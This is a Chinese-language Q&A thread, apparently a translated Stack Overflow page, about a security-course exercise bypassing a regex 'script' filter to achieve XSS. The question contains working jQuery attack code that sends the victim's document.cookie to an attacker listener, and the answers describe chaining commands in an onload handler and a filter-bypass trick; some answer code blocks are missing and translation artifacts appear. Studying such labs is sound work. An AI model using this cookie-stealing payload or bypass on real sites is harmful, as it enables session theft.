这是一个来自网络安全实践的问题。
该网站(为此目的而设置)试图通过使用以下代码过滤“脚本”标签来防止XSS:
filtered = re.sub(r"(?i)script", "", input)字符串
任务是在受害者的浏览器中执行一个有效载荷,它会做一些事情,包括将他们的cookie发送到远程netcat连接。
我对此进行了研究,发现我可以通过查询来执行单个JavaScript命令,例如:
"<body onload=alert(\"hello\");>"型
然而,这并不能解决我的问题,因为它只能执行一个命令(我相信)。我需要执行的有效负载包含多个命令。
我还尝试使用HTML字符代码来避免过滤器,例如:
"<script>..."型
但过滤器会过滤掉
下面是我使用的代码库:
<html>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>
function payload(attacker) {
function log(data) {
$.get(attacker, data);
}
function proxy(href) {
$("html").load(href, function(){
//Send cookie to remote connection
log(document.cookie);
});
}
proxy("./");
}
function makeLink(xssdefense, target, attacker) {
if (xssdefense == 0) {
//Code to execute when there is no filter
return target + "./search?xssdefemse=" + xssdefense.toString() + "&q=" +
encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</script" + ">");
}
else {
//Code to execute when 'script' is filtered
return target + "./search?xssdefemse=" + xssdefense.toString() + "&q=" +
encodeURIComponent("<body onload=alert(\"test\");>");
}
}
var xssdefense = 1;
var target = "http://81.211.34.1/xsstest";
var attacker = "http://127.0.0.1:31337/";
$(function() {
var url = makeLink(xssdefense, target, attacker);
$("h3").html("<a id=\"link\" target=\"run\" href=\"" + url + "\"> Enter Site!<\a>");
document.getElementById("link").click();
});
</script> <h3></h3>
</html>型
任何帮助将不胜感激!
3条答案
按热度按时间piv4azn71#
onload=属性中只能有一个表达式,但仍然可以执行多个命令。好方法:
字符串
这定义了一个函数表达式,它执行3个命令,然后被调用(最后是
())。更有效的方法(但认真地说,用第一种方法):
型
或者,如果你知道它们都返回假值(比如
undefined不返回任何东西)型
相反,如果你知道它们都返回truthy值(如数字,字符串或对象),
型
1wnzp6jl2#
你可以在
onload中有多个表达式:字符串
cgfeq70w3#
我也被问到类似的问题.content = content.replaceAll(“(?i)<(/)?script>",““);对我有效的是:alert(1)